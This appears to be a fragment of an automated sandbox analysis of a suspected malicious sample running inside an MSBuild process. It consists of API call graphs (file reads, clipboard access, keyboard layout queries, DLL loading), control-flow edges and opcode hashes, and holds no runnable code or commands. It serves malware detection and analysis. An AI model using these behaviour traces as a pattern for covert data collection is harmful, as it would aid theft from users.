106033->106036 106034 760664e 106034->106005 106035->106034 106036->106034 106039 7606544 106037->106039 106038 76065b8 106038->106005 106039->106038 106041 7606708 2 API calls 106039->106041 106042 7606718 2 API calls 106039->106042 106040 760664e 106040->106005 106041->106040 106042->106040 106044 7606635 106043->106044 106046 7606708 2 API calls 106044->106046 106047 7606718 2 API calls 106044->106047 106045 760664e 106045->106005 106046->106045 106047->106045 106049 7603b80 106048->106049 106058 7603bc8 106049->106058 106062 7603bb8 106049->106062 106050 7603bab 106050->106022 106054 7603b95 106053->106054 106056 7603bc8 2 API calls 106054->106056 106057 7603bb8 2 API calls 106054->106057 106055 7603bab 106055->106022 106056->106055 106057->106055 106059 7603bdd 106058->106059 106066 7603c5a 106059->106066 106063 7603bbd 106062->106063 106065 7603c5a 2 API calls 106063->106065 106064 7603c05 106064->106050 106065->106064 106067 7603c7d 106066->106067 106071 7603ca0 106067->106071 106075 7603cb0 106067->106075 106068 7603c05 106068->106050 106072 7603cb0 106071->106072 106074 7603d68 CreateFileA CreateFileA 106072->106074 106073 7603d15 106073->106068 106074->106073 106076 7603cca 106075->106076 106078 7603d68 CreateFileA CreateFileA 106076->106078 106077 7603d15 106077->106068 106078->106077 106080 7606718 106079->106080 106087 7606808 106080->106087 106084 760673f 106083->106084 106086 7606808 2 API calls 106084->106086 106085 7606781 106085->106028 106086->106085 106088 760682d 106087->106088 106092 7606870 106088->106092 106097 7606860 106088->106097 106093 7606897 106092->106093 106102 7606bcc 106093->106102 106106 7606bd8 106093->106106 106098 7606870 106097->106098 106100 7606bd8 ReadFile 106098->106100 106101 7606bcc ReadFile 106098->106101 106099 7606781 106099->106028 106100->106099 106101->106099 106103 7606bd8 ReadFile 106102->106103 106105 7606c93 106103->106105 106107 7606c2a ReadFile 106106->106107 106109 7606c93 106107->106109 106109->106109 106111 7608b4a 106110->106111 106132 7609030 106111->106132 106136 760a367 106111->106136 106140 760a2aa 106111->106140 106112 7606a9e 106116 7478e90 106112->106116 106124 7478e80 106112->106124 106117 7478eaa 106116->106117 106144 74794d7 106117->106144 106150 7478f78 106117->106150 106156 7478f88 106117->106156 106162 74794ce 106117->106162 106168 74794cc 106117->106168 106125 7478eaa 106124->106125 106127 74794d7 4 API calls 106125->106127 106128 74794ce 4 API calls 106125->106128 106129 74794cc 4 API calls 106125->106129 106130 7478f78 4 API calls 106125->106130 106131 7478f88 4 API calls 106125->106131 106126 7478ebd 106126->105886 106127->106126 106128->106126 106129->106126 106130->106126 106131->106126 106134 760905d 106132->106134 106133 760a351 106133->106133 106134->106133 106135 760a8a8 CreateFileA CreateFileA ReadFile ReadFile 106134->106135 106135->106134 106137 760a351 106136->106137 106138 7609179 106136->106138 106138->106137 106139 760a8a8 CreateFileA CreateFileA ReadFile ReadFile 106138->106139 106139->106138 106142 7609179 106140->106142 106141 760a351 106141->106141 106142->106141 106143 760a8a8 CreateFileA CreateFileA ReadFile ReadFile 106142->106143 106143->106142 106146 74790c3 106144->106146 106145 74794fa 106145->106145 106146->106145 106174 7479792 106146->106174 106179 74797d0 106146->106179 106184 7479798 106146->106184 106151 7478fb2 106150->106151 106152 74794fa 106151->106152 106153 7479792 4 API calls 106151->106153 106154 74797d0 4 API calls 106151->106154 106155 7479798 4 API calls 106151->106155 106152->106152 106153->106151 106154->106151 106155->106151 106158 7478fb2 106156->106158 106157 74794fa 106157->106157 106158->106157 106159 7479792 4 API calls 106158->106159 106160 74797d0 4 API calls 106158->106160 106161 7479798 4 API calls 106158->106161 106159->106158 106160->106158 106161->106158 106164 74790c3 106162->106164 106163 74794fa 106163->106163 106164->106163 106165 7479792 4 API calls 106164->106165 106166 74797d0 4 API calls 106164->106166 106167 7479798 4 API calls 106164->106167 106165->106164 106166->106164 106167->106164 106170 74790c3 106168->106170 106169 74794fa 106169->106169 106170->106169 106171 7479792 4 API calls 106170->106171 106172 74797d0 4 API calls 106170->106172 106173 7479798 4 API calls 106170->106173 106171->106170 106172->106170 106173->106170 106175 7479796 106174->106175 106175->106146 106189 7479817 106175->106189 106194 7479828 106175->106194 106176 747980d 106176->106146 106180 74797d8 106179->106180 106182 7479817 4 API calls 106180->106182 106183 7479828 4 API calls 106180->106183 106181 747980d 106181->106146 106182->106181 106183->106181 106185 74797aa 106184->106185 106185->106146 106187 7479817 4 API calls 106185->106187 106188 7479828 4 API calls 106185->106188 106186 747980d 106186->106146 106187->106186 106188->106186 106190 7479852 106189->106190 106191 74798ce 106190->106191 106199 7278f00 106190->106199 106203 7278ef3 106190->106203 106191->106176 106195 7479852 106194->106195 106196 74798ce 106195->106196 106197 7278ef3 4 API calls 106195->106197 106198 7278f00 4 API calls 106195->106198 106196->106176 106197->106196 106198->106196 106200 7278f27 106199->106200 106202 76036e8 4 API calls 106200->106202 106201 7279002 106201->106191 106202->106201 106204 7278f00 106203->106204 106206 76036e8 4 API calls 106204->106206 106205 7279002 106205->106191 106206->106205 106207 71c0498 106208 71c04bc 106207->106208 106212 71c05e8 106208->106212 106219 71c05f8 106208->106219 106209 71c0513 106213 71c05f8 106212->106213 106226 71c0698 106213->106226 106231 71c06a8 106213->106231 106214 71c063a GetKeyboardLayout 106216 71c0671 106214->106216 106216->106209 106220 71c0631 106219->106220 106224 71c0698 2 API calls 106220->106224 106225 71c06a8 2 API calls 106220->106225 106221 71c063a GetKeyboardLayout 106223 71c0671 106221->106223 106223->106209 106224->106221 106225->106221 106227 71c06b3 106226->106227 106228 71c06c3 106227->106228 106236 71c06f8 OleInitialize 106227->106236 106238 71c06f0 106227->106238 106228->106214 106232 71c06b3 106231->106232 106233 71c06c3 106232->106233 106234 71c06f8 OleInitialize 106232->106234 106235 71c06f0 OleInitialize 106232->106235 106233->106214 106234->106233 106235->106233 106237 71c075c 106236->106237 106237->106228 106239 71c06f8 OleInitialize 106238->106239 106240 71c075c 106239->106240 106240->106228 106281 71c14a0 106282 71c14a8 106281->106282 106286 71c1577 106282->106286 106292 71c1588 106282->106292 106283 71c14db 106287 71c157b 106286->106287 106289 71c15b9 106287->106289 106298 71c16a0 106287->106298 106303 71c1690 106287->106303 106288 71c15d7 106288->106283 106289->106283 106293 71c15a0 106292->106293 106295 71c15b9 106293->106295 106296 71c1690 2 API calls 106293->106296 106297 71c16a0 2 API calls 106293->106297 106294 71c15d7 106294->106283 106295->106283 106296->106294 106297->106294 106299 71c16b5 106298->106299 106300 71c16db 106299->106300 106308 71c173d 106299->106308 106311 71c1748 106299->106311 106300->106288 106304 71c16a0 106303->106304 106305 71c16db 106304->106305 106306 71c173d OleGetClipboard 106304->106306 106307 71c1748 OleGetClipboard 106304->106307 106305->106288 106306->106304 106307->106304 106309 71c17a2 OleGetClipboard 106308->106309 106310 71c17e2 106309->106310 106310->106310 106312 71c17a2 OleGetClipboard 106311->106312 106313 71c17e2 106312->106313 106241 747cc48 106242 747cdd3 106241->106242 106244 747cc6e 106241->106244 106244->106242 106245 747c4b4 106244->106245 106246 747cec8 PostMessageW 106245->106246 106247 747cf34 106246->106247 106247->106244 106277 7271508 106278 7271550 LoadLibraryW 106277->106278 106279 727154a 106277->106279 106280 727157d 106278->106280 106279->106278 106324 727df58 106325 727df6d 106324->106325 106329 727dfa0 106325->106329 106333 727df90 106325->106333 106326 727df80 106330 727dfc4 106329->106330 106337 727e2c6 106330->106337 106334 727dfc4 106333->106334 106336 727e2c6 2 API calls 106334->106336 106335 727e02a 106335->106326 106336->106335 106338 727e2dd 106337->106338 106342 727e720 106338->106342 106347 727e711 106338->106347 106339 727e02a 106339->106326 106343 727e747 106342->106343 106352 727e7e0 106343->106352 106356 727e7d9 106343->106356 106344 727e7b4 106344->106339 106348 727e720 106347->106348 106350 727e7e0 LdrLoadDll 106348->106350 106351 727e7d9 LdrLoadDll 106348->106351 106349 727e7b4 106349->106339 106350->106349 106351->106349 106353 727e82b LdrLoadDll 106352->106353 106355 727e86c 106353->106355 106355->106344 106357 727e7e0 LdrLoadDll 106356->106357 106359 727e86c 106357->106359 106359->106344

                                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                                Function 072A0040 Relevance: 3.3, Strings: 1, Instructions: 2024COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 1065 72a0040-72a006b 1066 72a006d 1065->1066 1067 72a0072-72a00ad 1065->1067 1066->1067 1070 72a00b3-72a013a 1067->1070 1071 72a0145-72a0184 1067->1071 1070->1071 1076 72a298a-72a299a 1071->1076 1079 72a0189-72a01a5 1076->1079 1080 72a29a0-72a29d9 1076->1080 1086 72a01ab-72a0232 1079->1086 1087 72a023d-72a0263 1079->1087 1088 72a29db 1080->1088 1089 72a29e7 1080->1089 1086->1087 1090 72a033a-72a038d 1087->1090 1091 72a0269-72a0337 1087->1091 1088->1089 1095 72a29e8 1089->1095 1103 72a2933-72a2943 1090->1103 1091->1090 1095->1095 1109 72a2949-72a2979 1103->1109 1110 72a0392-72a03ab 1103->1110 1118 72a297b 1109->1118 1119 72a2987 1109->1119 1116 72a04e9-72a0515 1110->1116 1117 72a03b1-72a04de 1110->1117 1121 72a051b-72a0613 1116->1121 1122 72a0619-72a0698 1116->1122 1117->1116 1118->1119 1119->1076 1121->1122 1130 72a069e-72a07d9 1122->1130 1131 72a07df-72a0882 1122->1131 1130->1131 1141 72a0888-72a09d3 1131->1141 1142 72a09d9-72a0a65 1131->1142 1141->1142 1145 72a0a6b-72a0bd1 1142->1145 1146 72a0bd7-72a0c7b 1142->1146 1145->1146 1150 72a0c81-72a0dd0 1146->1150 1151 72a0dd6-72a0eb5 1146->1151 1150->1151 1166 72a0ebb-72a0ffe 1151->1166 1167 72a1004-72a10cc 1151->1167 1166->1167 1201 72a11bb-72a121d 1167->1201 1202 72a10d2-72a11b5 1167->1202 1209 72a1223-72a1310 1201->1209 1210 72a1316-72a1372 1201->1210 1202->1201 1209->1210 1214 72a1378-72a147f 1210->1214 1215 72a1485-72a14c5 1210->1215 1214->1215 1408 72a14c8 call 72add7b 1215->1408 1409 72a14c8 call 72adb60 1215->1409 1410 72a14c8 call 72adb70 1215->1410 1411 72a14c8 call 72ade54 1215->1411 1227 72a14ca-72a1507 1229 72a1509-72a1541 1227->1229 1230 72a1543-72a1573 1227->1230 1233 72a157d-72a159e 1229->1233 1230->1233 1404 72a15a1 call 72ae538 1233->1404 1405 72a15a1 call 72ae4d8 1233->1405 1406 72a15a1 call 72ae74f 1233->1406 1407 72a15a1 call 72ae85c 1233->1407 1237 72a15a3-72a15b9 1239 72a15bf-72a1646 1237->1239 1240 72a1651-72a1699 1237->1240 1239->1240 1252 72a28bd-72a28d3 1240->1252 1257 72a28d9-72a2909 1252->1257 1258 72a169e-72a16d2 1252->1258 1266 72a290b 1257->1266 1267 72a2917 1257->1267 1263 72a17ca-72a183d 1258->1263 1264 72a16d8-72a17c4 1258->1264 1273 72a1938-72a19ae 1263->1273 1274 72a1843-72a1932 1263->1274 1264->1263 1266->1267 1267->1103 1281 72a1a5e-72a1aa2 1273->1281 1282 72a19b4-72a1a58 1273->1282 1274->1273 1285 72a1aa8-72a1c07 1281->1285 1286 72a1c0d-72a1c69 1281->1286 1282->1281 1285->1286 1289 72a1c6f-72a1d76 1286->1289 1290 72a1d7c-72a1df0 1286->1290 1289->1290 1291 72a1f1b-72a1fc1 1290->1291 1292 72a1df6-72a1f15 1290->1292 1310 72a210f-72a218f 1291->1310 1311 72a1fc7-72a2109 1291->1311 1292->1291 1315 72a2306-72a23d9 1310->1315 1316 72a2195-72a2300 1310->1316 1311->1310 1336 72a23df-72a252e 1315->1336 1337 72a2534-72a2639 1315->1337 1316->1315 1336->1337 1375 72a26e9-72a272d 1337->1375 1376 72a263f-72a26e3 1337->1376 1379 72a2828-72a28ae 1375->1379 1380 72a2733-72a2822 1375->1380 1376->1375 1379->1252 1380->1379 1404->1237 1405->1237 1406->1237 1407->1237 1408->1227 1409->1227 1410->1227 1411->1227
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: S
                                                                                                                                                                                                                                                • API String ID: 0-543223747
                                                                                                                                                                                                                                                • Opcode ID: 1c34002ee66bb93219c658e6fbdd7c47a6b81d598186a6b6f6e4b2b26fd1c91e
                                                                                                                                                                                                                                                • Instruction ID: 2fd0e40970d20efe402a9774928c806bcf8071df40ec1f91cfef5f51f159a505
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1c34002ee66bb93219c658e6fbdd7c47a6b81d598186a6b6f6e4b2b26fd1c91e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 624360B4E012298FDBA5DF69DC84BD9B7F2BB88310F1081EA990DA7354DB315E819F44
                                                                                                                                                                                                                                                Function 054E6420 Relevance: 3.2, Strings: 1, Instructions: 1930COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1667172186.00000000054E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054E0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_54e0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                                                • API String ID: 0-4108050209
                                                                                                                                                                                                                                                • Opcode ID: d61667c4cf335d12543249ac269b625c24ee5bf7cda43ce2d7ec092235131d8b
                                                                                                                                                                                                                                                • Instruction ID: 2d995c0f3df2080ccaca34fa784c6d960e96b50f7a49f12641565b1db2eb7f33
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d61667c4cf335d12543249ac269b625c24ee5bf7cda43ce2d7ec092235131d8b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ADF29E30B002189FDB159B64CD54BEEBBB6FF89304F10819AE606AB3A1DB719D45CF61
                                                                                                                                                                                                                                                Function 054E63E6 Relevance: 2.0, Strings: 1, Instructions: 795COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1667172186.00000000054E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054E0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_54e0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 0
                                                                                                                                                                                                                                                • API String ID: 0-4108050209
                                                                                                                                                                                                                                                • Opcode ID: 064ee7ea8bfd635a3db83f19ee236ea9f42ac6d3e23982e15be5db646926ccee
                                                                                                                                                                                                                                                • Instruction ID: 8f360283ed9e3dee322b668b4e4293459de589ef79e59431ed991082cf59bb4f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 064ee7ea8bfd635a3db83f19ee236ea9f42ac6d3e23982e15be5db646926ccee
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E352C070A08384AFDB519B64DC58FAF7BB6BF86304F15409AE2019B3A2CB75DC40CB61
                                                                                                                                                                                                                                                Function 0711EC20 Relevance: 1.7, Strings: 1, Instructions: 439COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672543242.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7110000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: %
                                                                                                                                                                                                                                                • API String ID: 0-2567322570
                                                                                                                                                                                                                                                • Opcode ID: 36d55de6617b1ed099d54e0fdc070c463d7bf14004c9a43987744a5da16b92d8
                                                                                                                                                                                                                                                • Instruction ID: 3ea9e8d58c43a625ccab89ff11bf11fad10a50bc756029f9df10ea602c342eb9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 36d55de6617b1ed099d54e0fdc070c463d7bf14004c9a43987744a5da16b92d8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 560249B0A00205DFDB15EFA4D844AAEBBB2FF88311F148529D9069F395DB35E906CF51
                                                                                                                                                                                                                                                Function 072A38E8 Relevance: 1.7, Strings: 1, Instructions: 422COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                                                                • API String ID: 0-2766056989
                                                                                                                                                                                                                                                • Opcode ID: abab275f0c2f378407ca4734962e42749751c3edb7b9e7cece4bede077b49d03
                                                                                                                                                                                                                                                • Instruction ID: c6fa9d97779066511e34b66322cf68ce07355aa3cf455107496764c51c988fb3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: abab275f0c2f378407ca4734962e42749751c3edb7b9e7cece4bede077b49d03
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CF023DB0A10206EFDB19DF64C494AAEBBB7BF89300F148469E9069B296DB35DD41CF50
                                                                                                                                                                                                                                                Function 0727E7E0 Relevance: 1.6, APIs: 1, Instructions: 59libraryloaderCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LdrLoadDll.NTDLL(?,?,?,?), ref: 0727E85D
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674082269.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7270000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Load
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2234796835-0
                                                                                                                                                                                                                                                • Opcode ID: d14a032052944596fd15fe6404ad7cb5a920d5031461620169ed8aca8209ebf7
                                                                                                                                                                                                                                                • Instruction ID: 2165866697b10c57be5740be1ebd89cd727ed939294b1297cb17346622cdb81d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d14a032052944596fd15fe6404ad7cb5a920d5031461620169ed8aca8209ebf7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8E21CFB1D002599FDB10DFAAC885BDEFBF5BB48210F10842AE919A7250D775A940CBA5
                                                                                                                                                                                                                                                Function 0711B8E8 Relevance: 1.3, Instructions: 1271COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672543242.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7110000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 1fa79ca9e84d2bc76b9cb41099a01c5a914487ab14d33521d023ab48a18fd886
                                                                                                                                                                                                                                                • Instruction ID: 7699a4e9d7f7faf01dfb2436c3e60f8ed5366bb9006d4f1084639f5b7bc5cd10
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1fa79ca9e84d2bc76b9cb41099a01c5a914487ab14d33521d023ab48a18fd886
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 12C2F8B4A00219DFDB25DF64C854BADBBB2FF49301F1485A9D90AAB290DB31DD81CF91
                                                                                                                                                                                                                                                Function 07118B98 Relevance: 1.0, Instructions: 976COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672543242.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7110000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: b9e8ab5fa3cfe14286854d00ceee3325f44323cc8922fbcedfab3d349342069a
                                                                                                                                                                                                                                                • Instruction ID: 80a72049503e3c1ac22488037522de4d444cd40bd7458ad5d2f49553a76c3dd2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b9e8ab5fa3cfe14286854d00ceee3325f44323cc8922fbcedfab3d349342069a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 15923AB4A00215CFDB25DF68C954A69B7F2FF89310F1585A9D84AAB3A1DB30ED81CF11
                                                                                                                                                                                                                                                Function 072AE900 Relevance: .6, Instructions: 645COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 88a30b75e92bedb11d1dba287d1498981cc1010be0dc70c10aba9cfe6cfb7c08
                                                                                                                                                                                                                                                • Instruction ID: dcd47648d85afebf1867d77968df984b05db431fcdaede7c64ba7a6df32cf1a5
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 88a30b75e92bedb11d1dba287d1498981cc1010be0dc70c10aba9cfe6cfb7c08
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3E32ACB0B10306AFDB08DF64C8447AEBBF3AF88310F158569E4069B2A1DB74DD46CB95
                                                                                                                                                                                                                                                Function 071B4240 Relevance: .6, Instructions: 637COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 72f259492b83b5a3ba538774d0c9d40c6d5ded7fd86cacb75f33c5e8664af13f
                                                                                                                                                                                                                                                • Instruction ID: 3ab87498312d6683f78e7424fac17c5af1b796b3e9f62a453ebf556755a4856d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 72f259492b83b5a3ba538774d0c9d40c6d5ded7fd86cacb75f33c5e8664af13f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 60425CB0A00241DFDB29DF64C494AAEBBF2BF89300F158568D956DB392DB35EC41CB90
                                                                                                                                                                                                                                                Function 0711F738 Relevance: .6, Instructions: 629COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672543242.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7110000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 3857fdbaf3c95faca6ddde6f60f940ab232e52d71c8a50c2c1ce48ca80a0725c
                                                                                                                                                                                                                                                • Instruction ID: 5ef9fc0bde31c15e8f30f75d4e1e628f4bc3e91493d2c9c94377b0d7e088ab4e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3857fdbaf3c95faca6ddde6f60f940ab232e52d71c8a50c2c1ce48ca80a0725c
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 76329CB1B02705DFCB26DF38D54466AB7FABF85315F158539E4069BA91CB38E882CB10
                                                                                                                                                                                                                                                Function 072A2FB0 Relevance: .6, Instructions: 623COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 2579a1186342d0b635fc5f7d6ffa868c08f7ef0b1d1aedbecc2ff2216503ef9b
                                                                                                                                                                                                                                                • Instruction ID: aafc45b653104edd654801a4b2b48d5bb92a3d5bf3f101cb2278952a55246d27
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2579a1186342d0b635fc5f7d6ffa868c08f7ef0b1d1aedbecc2ff2216503ef9b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6E325BB4B102059FDB15DF69C484AAABBF2BF89710F1581A9E505DB3A2CB31EC41CB50
                                                                                                                                                                                                                                                Function 054E1020 Relevance: .6, Instructions: 621COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1667172186.00000000054E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054E0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_54e0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: deff885e1d98706de01075e07dfd097a53bae6880c1f30851a2ecca33b3b5ddb
                                                                                                                                                                                                                                                • Instruction ID: 15a04b3516f0dc0e0a80ad05b86ef10109921b2021d9c7efb1a418af239b26e1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: deff885e1d98706de01075e07dfd097a53bae6880c1f30851a2ecca33b3b5ddb
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DA32CB30B402058FDB19CBA9D854ABFBBF7BF89211B14949AE516DB3A1CB30DC46CB51
                                                                                                                                                                                                                                                Function 0709D078 Relevance: .5, Instructions: 536COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: e68e1079022d0299ec44edd18c101e3adaaf5daddb2757e584c1d4991af0f6be
                                                                                                                                                                                                                                                • Instruction ID: 0eb52708bf2e6c4a28d1b851290e7d83a433ef03c7cf82513f9ffd91f0f9f204
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e68e1079022d0299ec44edd18c101e3adaaf5daddb2757e584c1d4991af0f6be
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4B1261B4B002059FDB54DF69D894AAEB7F6FF89710B148169D906EB365DB30EC01CBA0
